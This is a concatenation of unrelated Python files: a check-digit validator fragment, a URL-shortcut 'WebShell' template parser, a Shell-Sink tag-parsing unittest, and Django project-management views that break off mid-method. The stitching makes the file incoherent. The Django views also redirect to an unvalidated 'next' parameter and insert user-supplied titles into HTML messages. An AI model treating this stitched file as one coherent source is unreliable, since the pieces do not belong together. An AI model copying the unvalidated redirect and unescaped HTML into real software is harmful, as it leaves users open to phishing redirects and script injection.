    # sum of digits in odd positions (1st, 3rd, ..., 11th => indices 0,2,...,10)
    odd_sum = sum(digits[0::2])
    # sum of digits in even positions, excluding the check digit (indices 1,3,...,9)
    even_sum = sum(digits[1:11:2])
    # perform multiplication, addition, and modulo operations
    check = (even_sum + odd_sum * 3) % 10
    if check != 0:
        check = 10 - check
    # the computed value must match the final (check) digit
    return check == digits[11]
# WebShell.py - class for parsing awebshell commands, parsing web shell URLs, and determining a final resulting URL.
#
# Copyright 2013 Lee Bush. All rights reserved.
# Copyright 2013 AllStruck. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#There are some TODO and ZZZ items below that need to be addressed.
#Also, I do not claim that this is the most efficient way to parse, but it gets the job done...
#Don't forget to add/maintain the test cases in the 'tests' folder as you change this code.
# -Lee
__all__ = ['WebShell']

#syntax highlight URLs
#validate URLs

import re
import urllib
import types

# Regex building blocks for the Web Shell URL template language.
KEY_NAME_STRING_REGEX_STRING = r'[_A-Za-z][_A-Za-z0-9]*'
VALUE_STRING_REGEX_STRING = r'[^{}]*'
VAR_REFERENCE_REGEX_STRING = r'\$\{(' + KEY_NAME_STRING_REGEX_STRING + r')\}'
# Matches ${name} and ${name=default} parameter references.
PARAMETER_REGEX = re.compile(r'\$\{(' + KEY_NAME_STRING_REGEX_STRING + r')([=]' + VALUE_STRING_REGEX_STRING + r')?\}')
# Matches a single "case => value" arm inside a { switch ... } construct.
CASE_THEN_VALUE_REGEX_STRING = r'[^={}]+ \=\> [^={},]+'
CASE_THEN_VALUE_REGEX = re.compile(CASE_THEN_VALUE_REGEX_STRING)
SWITCH_REGEX = re.compile(r'\{ switch ' + VAR_REFERENCE_REGEX_STRING + '( \| )(' + CASE_THEN_VALUE_REGEX_STRING + ')(, ' + CASE_THEN_VALUE_REGEX_STRING + ')*( \})')
#SWITCH_REGEX = re.compile(r'\{(:\s)*switch(:\s)+' + VAR_REFERENCE_REGEX_STRING + r'(:\s*\|)(\s)*(' + CASE_THEN_VALUE_REGEX_STRING + r')(,(:\s)*' + CASE_THEN_VALUE_REGEX_STRING + r')*(\s*\})') #ZZZ broken! not working like I want...

#assert(re.compile(r'\{\s*').match('{'))
#assert(re.compile(r'\{\s*').match('{ '))
#print re.compile(r'\{(:\s)*').match('{ ').regs
#assert(not re.compile(r'\{(:\s*)').match('{{ '))
#print OPTION_POST_REGEX.match('[post]').groups() #ZZZ test.
#print OPTION_USE_X_FOR_SPACES_REGEX.match('[use - for spaces]').groups()#ZZZ test.
#print SWITCH_REGEX.match('{ switch ${plat} | xbox => 13 }').groups()
#print SWITCH_REGEX.match('{ switch ${plat} | * => 13 }').groups()
#print SWITCH_REGEX.match('{ switch ${plat} | xbox => 13, dreamcast => 1, * => 0 }').groups() #ZZZ not getting dreamcast. need different loop-group extraction technique.

# Bracketed option directives that may appear inside a Web Shell URL template.
OPTION_POST_REGEX = re.compile(r'[[]post[]]')
OPTION_USE_X_FOR_SPACES_REGEX = re.compile(r'[[]use ([^]{} ]+) for spaces[]]')
OPTION_NO_URL_ENCODING_REGEX = re.compile(r'[[]no url encoding[]]')
from web_shell_exceptions import WebShellError, UnknownCommandError, CommandParseError, MissingParameterException, InvalidParameterValueException
class WebShell:
    '''
    The WebShell class receives commands (i.e., gim penguins), looks up command names in the
    provided command database, and then evaluates the final URL.

    Example:
        command_database = ... #create your command database somehow
        web_shell = WebShell(command_database) #create web shell object
        url, can_inline = web_shell.evaluate('gim penguins') #run command and determine resulting URL
        #now goto the url...
    '''

    INLINE_COMMANDS_SET = set(['cat', 'date']) #ZZZ this will be refactored and removed

    def __init__(self, command_database):
        '''
        Create a WebShell object.

        The command_database parameter is an object that must provide a get_command_web_shell_url() method.
        This method receives a command name as a parameter, and must return a Web Shell URL string:
        command_database.get_command_web_shell_url(command_name) => web_shell_url
        '''
        assert(hasattr(command_database, 'get_command_web_shell_url'))
        self.__command_database = command_database

    def validate_web_shell_url(self, web_shell_url):
        '''
        return True if the given Web Shell URL appears to be syntactically correct.
        return False otherwise.
        '''
        #BUG FIX: was "raise NotImplemented" -- NotImplemented is a value,
        #not an exception class, so raising it produced a TypeError instead
        #of the intended "not implemented" signal.
        raise NotImplementedError #ZZZ stub

    def evaluate(self, query_string):
        '''
        Evaluate a command line (command name followed by arguments).

        return (final_url, can_inline)
        '''
        query_string = query_string.strip() #remove all spaces from beginning and end of query.
        tokens = query_string.split()
        if (len(tokens) < 1):
            #empty query: nothing to look up
            return ('', False)
        else:
            command = tokens[0]
            arguments = tokens[1:]
            arguments_text = ' '.join(arguments)
            web_shell_url, can_inline = self.__get_command_web_shell_url_and_inline(command)
            evaluated_url = self.__execute_web_shell_url(web_shell_url, arguments_text)
            return (evaluated_url, can_inline)

    def __get_command_web_shell_url_and_inline(self, name):
        '''
        return tuple of the form (web_shell_url, can_inline) associated with the given command name.
        '''
        can_inline = (name in WebShell.INLINE_COMMANDS_SET)
        web_shell_url = self.__command_database.get_command_web_shell_url(name)
        assert(type(web_shell_url) in (types.StringType, types.UnicodeType)) #ensure database is following proper protocol
        return (web_shell_url, can_inline) #ZZZ stub

    def __parse_command_arguments(self, raw_argument_text):
        '''
        Split raw argument text into positional text and "-name value" parameters.

        return the tuple (respaced_argument_text, parameter_dictionary)
        '''
        tokens = raw_argument_text.split()
        parameter_dictionary = {}
        respaced_argument_text = ''
        current_key = None
        #simple state machine: 'initial' collects positional words,
        #'got_key' expects the value right after a "-name" token,
        #'more_values' appends further words to the current value.
        mode = 'initial'
        for token in tokens:
            if (mode == 'initial'):
                if (token.startswith('-')):
                    current_key = token[1:]
                    parameter_dictionary[current_key] = ''
                    mode = 'got_key'
                else:
                    if (respaced_argument_text):
                        respaced_argument_text += ' '
                    respaced_argument_text += token
            elif (mode == 'got_key'):
                if (token.startswith('-')):
                    #BUG FIX: previously raised the misspelled name
                    #"ComandParseError", which caused a NameError instead of
                    #the intended CommandParseError.
                    raise CommandParseError("expected an argument value for '%s', but recieved a new argument name of '%s'." % (current_key, token))
                else:
                    parameter_dictionary[current_key] = token
                    mode = 'more_values'
            elif (mode == 'more_values'):
                if (token.startswith('-')):
                    current_key = token[1:]
                    parameter_dictionary[current_key] = ''
                    mode = 'got_key'
                else:
                    if (parameter_dictionary[current_key]):
                        parameter_dictionary[current_key] += ' '
                    parameter_dictionary[current_key] += token
            else:
                assert(False) #should never happen
        return (respaced_argument_text, parameter_dictionary)

    def __execute_web_shell_url(self, web_shell_url, raw_argument_text):
        '''
        Expand option directives, { switch ... } constructs, ${param}
        references and the %s placeholder; return the final URL string.
        '''
        assert type(web_shell_url) in (types.StringType, types.UnicodeType)
        web_shell_url, options = self.__strip_web_shell_url_options(web_shell_url)
        assert type(web_shell_url) in (types.StringType, types.UnicodeType)
        raw_argument_text, arguments = self.__parse_command_arguments(raw_argument_text)

        #expand { switch ${var} | case => value, ... } constructs ----
        final_url = ''
        match_result = 'x' #something that is not None
        while (match_result is not None):
            match_result = SWITCH_REGEX.search(web_shell_url)
            if (match_result is not None):
                p0, p1 = match_result.regs[0]
                switch_var_name = match_result.group(1)
                p2 = match_result.regs[2][1]
                p3 = match_result.regs[4][1]
                switch_cases_text = web_shell_url[p2:p3]
                final_url = final_url + web_shell_url[0:p0] + self.__execute_switch_case_handler(switch_var_name, switch_cases_text, arguments)
                web_shell_url = web_shell_url[p1:]
        web_shell_url = final_url + web_shell_url

        #parse and replace ${variable} and ${variable=default_value} forms ----
        arguments_and_defaults_dictionary = {} #Note: if value is None, then the parameter is required
        final_url = ''
        start = 0
        match_result = 'x' #something that is not None
        while (match_result is not None):
            match_result = PARAMETER_REGEX.search(web_shell_url, start)
            if (match_result is None):
                break
            key, value = match_result.groups()
            if (value is not None):
                value = value[1:] #chop off '=' at beginning
            arguments_and_defaults_dictionary[key] = value
            p0, p1 = match_result.regs[0]
            first_chunk = web_shell_url[0:p0]
            final_url += first_chunk
            web_shell_url = web_shell_url[p1:]
            if (arguments.has_key(key)):
                final_url += self.__encode(arguments[key], options)
            else:
                if (value is not None):
                    final_url += self.__encode(value, options)
                else:
                    raise MissingParameterException("Mandatory value for parameter '%s' not provided." % key)
        web_shell_url = final_url + web_shell_url

        #finally substitute the (respaced) positional argument text for %s
        web_shell_url = web_shell_url.replace('%s', self.__encode(raw_argument_text, options))
        return web_shell_url

    def __encode(self, input_string, options):
        '''
        URL-encode input_string according to the template options and join
        words with the configured space-replacement character.
        '''
        space_replacer = options['space_replacer']
        if (space_replacer is None):
            space_replacer = '+'
        tokens = input_string.split() #split on whitespace
        if (options['encode_url']):
            tokens = map(urllib.quote, tokens, ['']*len(tokens)) #the urllib quote "safe" list is set empty so we can encode the slash.
        result_string = space_replacer.join(tokens)
        #ZZZ handle options['post'] here????
        return result_string

    def __strip_web_shell_url_options(self, web_shell_url):
        '''
        Remove [post], [use X for spaces] and [no url encoding] directives
        from the template.

        return (web_shell_url_without_directives, options_dictionary)
        '''
        assert type(web_shell_url) in (types.StringType, types.UnicodeType)
        options = {}

        match_result = OPTION_POST_REGEX.search(web_shell_url)
        if (match_result is None):
            options['post'] = False
        else:
            options['post'] = True
            p0, p1 = match_result.regs[0]
            web_shell_url = web_shell_url[0:p0] + web_shell_url[p1:]

        match_result = OPTION_USE_X_FOR_SPACES_REGEX.search(web_shell_url)
        if (match_result is None):
            options['space_replacer'] = None
        else:
            options['space_replacer'] = match_result.group(1)
            p0, p1 = match_result.regs[0]
            web_shell_url = web_shell_url[0:p0] + web_shell_url[p1:]

        match_result = OPTION_NO_URL_ENCODING_REGEX.search(web_shell_url)
        if (match_result is None):
            options['encode_url'] = True
        else:
            options['encode_url'] = False
            p0, p1 = match_result.regs[0]
            web_shell_url = web_shell_url[0:p0] + web_shell_url[p1:]

        assert type(web_shell_url) in (types.StringType, types.UnicodeType)
        return (web_shell_url, options)

    def __execute_switch_case_handler(self, switch_variable_name, switch_case_text, variable_value_dictionary):
        '''
        Resolve one { switch ... } construct: look the variable's value up in
        the case arms ('*' is the default case) and return the mapped text.
        '''
        DEFAULT_CASE_KEY = '*'
        matches = CASE_THEN_VALUE_REGEX.findall(switch_case_text)
        case_dictionary = {}
        for match_text in matches:
            case_value, result_value = match_text.split('=>')
            case_value = case_value.strip()
            if (case_value.startswith(',')):
                case_value = case_value[1:].lstrip()
            result_value = result_value.strip()
            case_dictionary[case_value] = result_value
        if (not variable_value_dictionary.has_key(switch_variable_name)):
            if (case_dictionary.has_key(DEFAULT_CASE_KEY)):
                return case_dictionary[DEFAULT_CASE_KEY]
            else:
                raise MissingParameterException("Error: required parameter '%s' not provided." % switch_variable_name)
        else:
            switch_variable_value = variable_value_dictionary[switch_variable_name]
            if (case_dictionary.has_key(switch_variable_value)):
                return case_dictionary[switch_variable_value]
            else:
                acceptable_keys = sorted(case_dictionary.keys())
                error_message = "Error: invalid value for parameter '%s': '%s'. The only acceptable values are: %s." % \
                        (switch_variable_name, switch_variable_value, acceptable_keys)
                raise InvalidParameterValueException(error_message)
        assert(False) #should never get here
"""
This file is part of Shell-Sink.
Copyright Joshua Cronemeyer 2008, 2009
Shell-Sink is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
Shell-Sink is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License v3 for more details.
You should have received a copy of the GNU General Public License
along with Shell-Sink. If not, see <http://www.gnu.org/licenses/>.
"""
import unittest
from shellsink_client import *
from mock import Mock
import os
class TestInlineTag(unittest.TestCase):
    """Tests for Client.inline_tags: parsing #tag comments out of shell commands."""

    def setUp(self):
        # The stub client carries no per-test state, so one per test is enough.
        self.client = StubClient()

    def test_one_inline_tag(self):
        self.assertEqual(['tag'], self.client.inline_tags("echo #tag"))

    def test_zero_inline_tags(self):
        self.assertEqual(None, self.client.inline_tags("echo"))

    def test_two_inline_tags(self):
        self.assertEqual(["tag1", "tag2"], self.client.inline_tags("echo #tag1:tag2"))

    def test_one_escaped_comment_delimiter(self):
        self.assertEqual(None, self.client.inline_tags("echo \#tag1:tag2"))

    def test_one_escaped_comment_delimiter_and_one_unescaped(self):
        self.assertEqual(["tag2"], self.client.inline_tags("echo \#tag1 #tag2"))

    def test_two_escaped_comment_delimiters_and_two_unescaped(self):
        self.assertEqual(["tag1", "tag2"], self.client.inline_tags("echo \#tag1 \#tag2 #tag1:tag2"))

    #These document a known issue.
    # def test_strange_adjoining_comments_are_escaped_behavior(self):
    #     self.assertEqual(None, self.client.inline_tags("echo \##tag"))

    # def test_strange_adjoining_comments_are_escaped_behavior_can_have_tag_later(self):
    #     self.assertEqual(["taglater"], self.client.inline_tags("echo \##tag #taglater"))
class StubClient(Client):
    # Override __init__ as a no-op so tests can call inline_tags without
    # whatever setup the real Client constructor performs (presumably
    # config/environment access -- confirm against shellsink_client).
    def __init__(self):
        pass
# Allow running this test module directly from the command line.
if __name__ == '__main__':
    unittest.main()
from datetime import date, datetime, timedelta
import subprocess
from django.conf import settings
from django.db.models import Q, Sum, Avg, Count
from django.contrib.admin.models import LogEntry, ADDITION, CHANGE, DELETION
from django.contrib.auth.models import User
from django.contrib.contenttypes.models import ContentType
from django.contrib.sites.models import Site
from django.utils.encoding import force_unicode
from django.contrib.auth.decorators import login_required
from django.contrib.admin.views.decorators import staff_member_required
from django.contrib import messages
from django.http import Http404
from django.views.generic import DetailView, ListView, CreateView, UpdateView
from django.views.generic.edit import FormMixin, ModelFormMixin
from django.views.decorators.csrf import csrf_exempt
from django.shortcuts import get_object_or_404, render_to_response
from django.template import RequestContext
from django.http import HttpResponseRedirect, HttpResponse
from django.core.cache import cache
from django.core.management import call_command
from django.core.paginator import Paginator
from django.core.urlresolvers import reverse
from django.utils.decorators import method_decorator
from django.utils import timezone
from django.core.mail import send_mail
from django.views.generic.base import View
from pm.models import Project, Task, Profile, ContentImport, Team
from pm.forms import TaskForm, TaskMiniForm, TaskCloseForm, ProjectForm, ProfileForm
from pm.tasks import send_notification
from pm.utils import get_task_change_message, get_project_change_message, get_profile_change_message
# Default datetime values used as form initial data.
# NOTE(review): evaluated once at import time, so in a long-running process
# these "now"-based defaults go stale -- confirm this is intended.
START_DT_INITIAL = timezone.now()
END_DT_INITIAL = timezone.now() + timedelta(days=90)
DUE_DT_INITIAL = timezone.now() + timedelta(weeks=1)

#Custom Action Flags
# Project-specific extensions to the admin LogEntry ADDITION/CHANGE/DELETION flags.
CLOSED = 5
MISSED = 6
def UserCurrent(request):
    """Redirect an authenticated user to their own detail page, anonymous users home."""
    if not request.user.is_authenticated():
        return HttpResponseRedirect(reverse('home'))
    return HttpResponseRedirect(reverse('user_detail', args=[request.user.username]))
def UserIdRedirect(request, pk=None):
    """Redirect a pk-based user URL to the canonical username-based URL (404 if no such user)."""
    username = get_object_or_404(User, pk=pk).username
    return HttpResponseRedirect(reverse('user_detail', args=[username]))
class UserListView(ListView):
    """Staff-only profile list, split into active and inactive employees."""
    model = Profile
    template_name = "proman/user_list.html"

    @method_decorator(staff_member_required)
    def dispatch(self, *args, **kwargs):
        # Restrict the entire view to staff members.
        return super(UserListView, self).dispatch(*args, **kwargs)

    def get_context_data(self, **kwargs):
        """Add employee groupings plus open work still owned by inactive employees."""
        context = super(UserListView, self).get_context_data(**kwargs)
        context['inactive_employees'] = Profile.objects.inactive_employees()
        context['active_employees'] = Profile.objects.active_employees()
        inactive_employees = context['inactive_employees']
        inactive_pks = [p.pk for p in inactive_employees]
        # Surface work orphaned by deactivated employees so it can be reassigned.
        context['open_projects_inactives'] = Project.objects.filter(version=False, owner_id__in=inactive_pks).exclude(status="done")
        context['open_tasks_inactives'] = Task.objects.filter(version=False, owner_id__in=inactive_pks, completed=False)
        return context
class ContactListView(UserListView):
    """List of non-staff (client contact) profiles; inherits staff-only access."""
    queryset = Profile.objects.filter(user__is_staff=False).order_by('last_name')
    context_object_name = "profiles"
    template_name = "proman/client_list.html"
class TeamListView(UserListView):
    """List of all teams, ordered by name."""
    # NOTE(review): inherits from UserListView (a Profile list) but swaps the
    # queryset to Team; the inherited employee context entries still refer to
    # Profiles -- confirm this mix is intended.
    queryset = Team.objects.all().order_by('name')
    context_object_name = "teams"
    template_name = "proman/profiles/team_list.html"
class UserCreateView(CreateView):
    """
    Creates a Profile

    Staff-only. Saving the form also creates the backing auth User and
    records an ADDITION entry in the admin log.
    """
    form_class = ProfileForm
    template_name = "proman/user_update.html"

    @method_decorator(staff_member_required)
    def dispatch(self, *args, **kwargs):
        return super(UserCreateView, self).dispatch(*args, **kwargs)

    def form_valid(self, form):
        # Save the profile first, then create and attach the auth User.
        self.object = form.save()
        # Fall back to the email address when no explicit username was given.
        username = self.object.email
        if form.cleaned_data['username']:
            username = form.cleaned_data['username']
        user_object = User.objects.create(username=username, email=self.object.email, first_name=self.object.first_name, last_name=self.object.last_name, is_active=True)
        self.object.user = user_object
        self.object.save()
        # Record the addition in the admin log.
        change_message = "added this profile"
        LogEntry.objects.log_action(
            user_id = self.request.user.pk,
            content_type_id = ContentType.objects.get_for_model(self.object).pk,
            object_id = self.object.pk,
            object_repr = force_unicode(self.object),
            action_flag = ADDITION,
            change_message = change_message
        )
        return HttpResponseRedirect(self.get_success_url())

    def get_success_url(self):
        # Honor an explicit ?next= redirect target when present.
        if self.request.GET.has_key('next'):
            messages.success(self.request, 'Successfully added the profile for <strong><a href="%s">%s</a></strong>.' % (self.object.get_absolute_url(), self.object.nice_name()), extra_tags='success profile-%s' % self.object.pk)
            return self.request.GET['next']
        messages.success(self.request, 'Successfully added this profile.', extra_tags='success profile-%s' % self.object.pk)
        return self.object.get_absolute_url()
class UserUpdateView(UpdateView):
    """
    Updates a Profile

    Also mirrors name/email/username/role/active fields onto the backing
    auth User and records a CHANGE entry in the admin log.
    """
    form_class = ProfileForm
    template_name = "proman/user_update.html"

    @method_decorator(login_required)
    def dispatch(self, *args, **kwargs):
        # NOTE(review): only login (not staff) is required here, unlike
        # UserCreateView -- confirm any authenticated user may edit profiles.
        return super(UserUpdateView, self).dispatch(*args, **kwargs)

    def get_object(self, **kwargs):
        obj = get_object_or_404(Profile, pk=self.kwargs['pk'])
        return obj

    def get_initial(self):
        # Seed form fields that live on the related User rather than the Profile.
        super(UserUpdateView, self).get_initial()
        if self.get_object().user.is_staff:
            role = "1"
        else:
            role = "0"
        self.initial = {
            "username": self.get_object().user.username,
            "role": role,
            "active": self.get_object().user.is_active,
        }
        return self.initial

    def form_valid(self, form):
        # Keep a pre-save snapshot so the change message can diff old vs new.
        self.object = form.save(commit=False)
        orig = Profile.objects.get(pk=self.object.pk)
        self.object = form.save()
        # Mirror profile fields onto the backing auth User.
        profile = self.object
        profile.user.first_name = profile.first_name
        profile.user.last_name = profile.last_name
        profile.user.email = profile.email
        profile.user.username = form.cleaned_data['username']
        if form.cleaned_data['role'] == "1":
            profile.user.is_staff = True
        else:
            profile.user.is_staff = False
        profile.user.is_active = form.cleaned_data['active']
        profile.user.save()
        change_message = get_profile_change_message(orig, self.object)
        LogEntry.objects.log_action(
            user_id = self.request.user.pk,
            content_type_id = ContentType.objects.get_for_model(self.object).pk,
            object_id = self.object.pk,
            object_repr = force_unicode(self.object),
            action_flag = CHANGE,
            change_message = change_message
        )
        return HttpResponseRedirect(self.get_success_url())

    def get_success_url(self):
        # Honor an explicit ?next= redirect target when present.
        if self.request.GET.has_key('next'):
            messages.success(self.request, 'Successfully updated the profile for <strong><a href="%s">%s</a></strong>.' % (self.object.get_absolute_url(), self.object.nice_name()), extra_tags='success profile-%s' % self.object.pk)
            return self.request.GET['next']
        messages.success(self.request, 'Successfully updated this profile.', extra_tags='success profile-%s' % self.object.pk)
        return self.object.get_absolute_url()
class UserDetailView(DetailView):
    """Profile detail page; for client profiles, also lists their projects and tasks."""
    model = Profile
    context_object_name = "profile"
    template_name = "proman/profile_detail.html"

    @method_decorator(login_required)
    def dispatch(self, *args, **kwargs):
        return super(UserDetailView, self).dispatch(*args, **kwargs)

    def get_context_data(self, **kwargs):
        context = super(UserDetailView, self).get_context_data(**kwargs)
        # Pull projects for a client
        if context['profile'].client:
            context['user_projects'] = Project.objects.filter(version=False, client=context['profile'].client).order_by('-status', 'start_dt')
            context['user_open_project_tasks'] = Task.objects.filter(version=False, project__client=context['profile'].client).exclude(completed=True, private=True).order_by('due_dt')
        # Page size used by the AJAX pagination in render_to_response.
        context['results_paginate'] = "10"
        return context

    def get_object(self, **kwargs):
        # Looked up by username (UserIdRedirect handles pk-based URLs).
        obj = get_object_or_404(Profile, user__username=self.kwargs['username'])
        return obj

    def render_to_response(self, context):
        """Used to pull paginated items via a GET"""
        # NOTE(review): the done_task_* branches read
        # context['user_done_project_tasks'], which get_context_data never
        # sets -- looks like a latent KeyError; confirm.
        if self.request.method == 'GET':
            if self.request.GET.get('open_task_page'):
                open_task_page = self.request.GET.get('open_task_page')
                paginator = Paginator(context['user_open_project_tasks'], context['results_paginate'])
                task_items = paginator.page(open_task_page).object_list
                return render_to_response("proman/task_table_items.html", locals(), context_instance=RequestContext(self.request))
            if self.request.GET.get('done_task_page'):
                done_task_page = self.request.GET.get('done_task_page')
                paginator = Paginator(context['user_done_project_tasks'], context['results_paginate'])
                task_items = paginator.page(done_task_page).object_list
                return render_to_response("proman/task_table_items.html", locals(), context_instance=RequestContext(self.request))
            if self.request.GET.get('done_task_search'):
                done_task_count = self.request.GET.get('done_task_search')
                task_items = context['user_done_project_tasks'][done_task_count:]
                return render_to_response("proman/task_table_items.html", locals(), context_instance=RequestContext(self.request))
            if self.request.GET.get('open_task_search'):
                open_task_count = self.request.GET.get('open_task_search')
                task_items = context['user_open_project_tasks'][open_task_count:]
                return render_to_response("proman/task_table_items.html", locals(), context_instance=RequestContext(self.request))
        return render_to_response(self.template_name, context, context_instance=RequestContext(self.request))
class TaskNotificationMixin(View):
    """Mixin that emails a task's owner when the task is assigned by someone else."""

    def task_notification(self):
        """ Create and send a notification as a celery task """
        # Uses the first Site's domain to build absolute links in the email body.
        site_url = Site.objects.all()[0].domain
        notice = send_notification.delay('[PM] Task Assigned: %s (%s)' % (self.object.title, self.object.project.client), 'You have just been assigned the following task from <a href="http://%s%s">%s</a>: <br /><br /><strong>%s</strong> (http://%s%s)<br />Due: (%s days)<br /><br /> %s<br /><br />' % (
            site_url,
            self.request.user.profile.get_absolute_url(),
            self.request.user.profile.nice_name(),
            self.object.title,
            site_url,
            self.object.get_absolute_url(),
            self.object.due_age(),
            self.object.description
        ), self.request.user.email, [self.object.owner.email], fail_silently=False)
        return notice
class TaskCreateView(CreateView, TaskNotificationMixin):
    """
    Creates a Task

    The new task becomes its own "original" (later edits version against
    it), an ADDITION is logged, and the owner is emailed when the task is
    assigned to someone other than the creator.
    """
    form_class = TaskForm
    template_name = "proman/task_update.html"
    success_url = '/projects/'

    @method_decorator(login_required)
    def dispatch(self, *args, **kwargs):
        return super(TaskCreateView, self).dispatch(*args, **kwargs)

    def get_initial(self):
        # Default owner to the current user, project from ?project=, and a
        # one-week due date.
        super(TaskCreateView, self).get_initial()
        project = self.request.GET.get("project")
        user = self.request.user
        self.initial = {"owner":user.id, "project":project, "due_dt": DUE_DT_INITIAL}
        return self.initial

    def form_valid(self, form):
        self.object = form.save(commit=False)
        self.object.original_creator = self.request.user.profile
        self.object.editor = self.request.user.profile
        self.object.save()
        # A task is its own "original"; needs a second save since the pk
        # only exists after the first one.
        self.object.original = self.object
        self.object.save()
        change_message = "added this task"
        LogEntry.objects.log_action(
            user_id = self.request.user.pk,
            content_type_id = ContentType.objects.get_for_model(self.object).pk,
            object_id = self.object.pk,
            object_repr = force_unicode(self.object),
            action_flag = ADDITION,
            change_message = change_message
        )
        if self.request.user.profile != self.object.owner:
            # If you aren't the owner, send the owner an email.
            self.task_notification()
        return HttpResponseRedirect(self.get_success_url())

    def get_success_url(self):
        if self.request.GET.has_key('next'):
            messages.success(self.request, 'Successfully added the task <strong><a href="%s">%s</a></strong>.' % (self.object.get_absolute_url(), self.object.title), extra_tags='success task-%s' % self.object.pk)
            return self.request.GET['next']
        messages.success(self.request, 'Successfully added the task <strong>%s</strong>.' % self.object.title, extra_tags='success task-%s' % self.object.pk)
        # BUG FIX: previously returned an HttpResponseRedirect object, which
        # form_valid then wrapped in a second HttpResponseRedirect.
        # get_success_url must return a URL string.
        return reverse('project_detail', args=[self.object.project.pk])
class TaskUpdateView(UpdateView, TaskNotificationMixin):
    """
    Updates a Task
    """
    form_class = TaskForm
    template_name = "proman/task_update.html"
    success_url = '/projects/'

    @method_decorator(login_required)
    def dispatch(self, *args, **kwargs):
        return super(TaskUpdateView, self).dispatch(*args, **kwargs)

    def get_object(self, **kwargs):
        # Fetch by URL pk; 404 on missing task.
        obj = get_object_or_404(Task, pk=self.kwargs['pk'])
        return obj

    def form_valid(self, form):
        self.object = form.save(commit=False)
        # Versioning trick: `orig` holds the pre-edit row; `new_obj` aliases
        # the SAME object, so clearing pk and saving inserts an archive copy
        # (version=True) with the old field values. After save(), orig/new_obj
        # refer to that archived row while self.object keeps the original pk.
        orig = Task.objects.get(pk=self.object.pk)
        new_obj = orig
        new_obj.pk = None
        new_obj.editor = self.request.user.profile
        new_obj.version = True
        new_obj.save()
        self.object.save()
        action_flag = CHANGE
        change_message = get_task_change_message(orig, self.object)
        # if changed from not done to done
        if not orig.completed and self.object.completed:
            action_flag = CLOSED
        LogEntry.objects.log_action(
            user_id = self.request.user.pk,
            content_type_id = ContentType.objects.get_for_model(self.object).pk,
            object_id = self.object.pk,
            object_repr = force_unicode(self.object),
            action_flag = action_flag,
            change_message = change_message
        )
        if self.request.user.profile != self.object.owner and new_obj.owner != self.object.owner:
            # If you aren't changing to yourself, and the owner changed, send them an email.
            self.task_notification()
        return HttpResponseRedirect(self.get_success_url())

    def get_success_url(self):
        # Honor ?next= redirects; otherwise back to the task page.
        if self.request.GET.has_key('next'):
            messages.success(self.request, 'Successfully updated the task <strong><a href="%s">%s</a></strong>.' % (self.object.get_absolute_url(), self.object.title), extra_tags='success task-%s' % self.object.pk)
            return self.request.GET['next']
        messages.success(self.request, 'Successfully updated this task.', extra_tags='success task-%s' % self.object.pk)
        return self.object.get_absolute_url()
class TaskCloseUpdateView(TaskUpdateView, TaskNotificationMixin):
    """
    Mini Form to Close a Task

    Same flow as TaskUpdateView but with the reduced TaskCloseForm and
    "closed" success messages.
    """
    form_class = TaskCloseForm

    def get_success_url(self):
        """Honor ?next= redirects; otherwise return to the task page."""
        tags = 'success task-%s' % self.object.pk
        if self.request.GET.has_key('next'):
            note = 'Successfully closed the task <strong><a href="%s">%s</a></strong>.' % (
                self.object.get_absolute_url(), self.object.title)
            messages.success(self.request, note, extra_tags=tags)
            return self.request.GET['next']
        messages.success(self.request, 'Successfully closed this task.', extra_tags=tags)
        return self.object.get_absolute_url()
class TaskDetailView(DetailView):
    # Task page with an inline "close task" mini-form and the task's
    # admin-log history.
    model = Task
    template_name = "proman/task_detail.html"
    context_object_name = "task"

    @method_decorator(login_required)
    def dispatch(self, *args, **kwargs):
        return super(TaskDetailView, self).dispatch(*args, **kwargs)

    def get_context_data(self, **kwargs):
        # Prefill the close form's completion timestamp with "now"-ish default.
        form = TaskCloseForm(instance=self.object)
        form.initial = {"completed_dt": START_DT_INITIAL}
        context = super(TaskDetailView, self).get_context_data(**kwargs)
        context['close_form'] = form
        # History: LogEntry rows recorded by the create/update views, newest first.
        context['task_logs'] = LogEntry.objects.filter(object_id=self.object.pk, content_type = ContentType.objects.get_for_model(self.object).pk).order_by('-action_time')
        return context
class ProjectCreateView(CreateView):
    """
    Creates a Project.

    Prefills owner and start/end dates, records an ADDITION LogEntry, and
    redirects to the new project's detail page.
    """
    form_class = ProjectForm
    template_name = "proman/project_update.html"

    @method_decorator(login_required)
    def dispatch(self, *args, **kwargs):
        return super(ProjectCreateView, self).dispatch(*args, **kwargs)

    def get_initial(self):
        """Default the owner to the current user and prefill the dates."""
        super(ProjectCreateView, self).get_initial()
        user = self.request.user
        self.initial = {"owner":user.id, "start_dt": START_DT_INITIAL, "end_dt": END_DT_INITIAL}
        return self.initial

    def form_valid(self, form):
        self.object = form.save(commit=False)
        # BUG FIX: the object was never persisted, so self.object.pk stayed
        # None -- the LogEntry below recorded no object_id and the reverse()
        # redirect failed. Save before logging/redirecting (matches the
        # pattern used by TaskCreateView).
        self.object.save()
        change_message = "added this project"
        LogEntry.objects.log_action(
            user_id = self.request.user.pk,
            content_type_id = ContentType.objects.get_for_model(self.object).pk,
            object_id = self.object.pk,
            object_repr = force_unicode(self.object),
            action_flag = ADDITION,
            change_message = change_message
        )
        messages.success(self.request, "Successfully added this new project, <strong>%s</strong>." % self.object.name, extra_tags='success')
        return HttpResponseRedirect(reverse('project_detail', args=[self.object.pk]))

    def get_success_url(self):
        """Honor ?next=; otherwise the project's own page."""
        if self.request.GET.has_key('next'):
            return self.request.GET['next']
        return self.object.get_absolute_url()
class ProjectUpdateView(UpdateView):
    """
    Updates a Project
    """
    form_class = ProjectForm
    template_name = "proman/project_update.html"

    @method_decorator(login_required)
    def dispatch(self, *args, **kwargs):
        return super(ProjectUpdateView, self).dispatch(*args, **kwargs)

    def get_object(self, **kwargs):
        # Fetch by URL pk; 404 on missing project.
        obj = get_object_or_404(Project, pk=self.kwargs['pk'])
        return obj

    def form_valid(self, form):
